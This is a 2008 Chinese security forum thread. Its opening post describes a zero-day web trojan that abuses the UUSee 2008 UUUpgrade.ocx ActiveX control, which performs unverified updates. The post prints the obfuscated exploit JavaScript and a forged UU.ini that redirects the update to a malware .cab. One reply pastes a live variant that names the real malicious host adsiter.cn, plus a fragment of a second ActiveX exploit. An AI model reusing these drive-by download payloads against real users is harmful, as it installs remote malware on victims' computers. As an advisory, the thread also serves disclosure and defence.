【UUsee 0DAY网马已在互联网进行传播】

ranguangning

关于UUSee网络电视：UUSee网络电视2008，是悠视网打造的一款全新网络电视收看软件，用户使用这款软件可以免费收看500多路新颖频道，共计1000多个精彩节目。


受影响版本：UUSee网络电视2008 4.0.0.32 （UUUpgrade.ocx 3.0.2.12）


描述：


近期知道安全应急团队捕获到利用UUsee网络电视的漏洞进行攻击的网页木马在互联网传播。实际上UUsee网马在今年一月已经开始流传，直到近期开始被传播。


由于UUsee的升级控件（Clsid：{2CACD7BB-1C59-4BBB-8E81-6E83F82C813B}[UUUpgrade.ocx 3.0.2.12])在进行升级的时候没有对升级文件进行验证，所以可以通过构造恶意虚假的升级文件让UUsee下载特定的恶意程序并且运行。


部分代码如下：


try{var g; var storm=new ActiveXObject(”UUUPGRADE.UUUpgradeCtrl.1″);} catch(g){}; finally{if(g!=”[object Error]”){ var url=”http://***“; storm=(document.createElement(”object”)); ActivePerl=”-1C59-4BBB-8E8″; getSpraySlide=”1-6E83F82C813B”; helloworld2Address=”clsid:2CACD7BB”; storm.setAttribute(”classid”,helloworld2Address+ActivePerl+getSpraySlide) storm[”Update”](”\Program Files\Common Files\uusee\” ,url+”UU.ini”,”",1)}}


这段代码通过修改访问者的UU.ini，将UU.ini里的升级URL指向恶意文件来进行攻击，以下为UU.ini的内容：


[Global]
TotalVersion=5.4.15.81
SubPath=UUPlayer_2008
force=2
[Add]
UUSeeMediaCenter.exe=9.0.0.12
[Kill]
[Remove]
[UUSeeMediaCenter.exe]
Url=http://***/malware.cab
subpath=
reg=1
type=1


另外，网络上最早出现UUsee网马生成器的截图：





官方暂无补丁。



[ 本帖最后由 ranguangning 于 2008-6-17 10:39 编辑 ]

冷冷

经常看到UUsee的下载器

fsr717af

幸好没用UUsee

kitecity

坏了，俺用这个玩意啊，赶紧卸载了

SW-27

没用那个，太多广告~~~

电影结束了

去下载玩玩
看看能不能找到

xqiafl

我一次也没碰到过,   这个网马利用. 唉!! 真是失败!!

IVKIS

看名字就不会用

sanhu35

从来不用UUS

qianwenxiang

记得12号解ADSITER.CN上面发现过UUSEE的

1. url="http://adsiter.cn/";storm=document.createElement("object");ActivePerl="-1C59-4BBB-8E8";getSpraySlide="1-6E83F82C813B";helloworld2Address="clsid:2CACD7BB";storm.setAttribute("classid",helloworld2Address+ActivePerl+getSpraySlide);storm["Update"]("\Program Files\Common Files\uusee",url+"UU.ini","",1)}}try{var h;var glworld=new ActiveXObject("GLIEDown.IEDown.1")}catch(h){};finally{if(h!="[object Error]"){doc

复制代码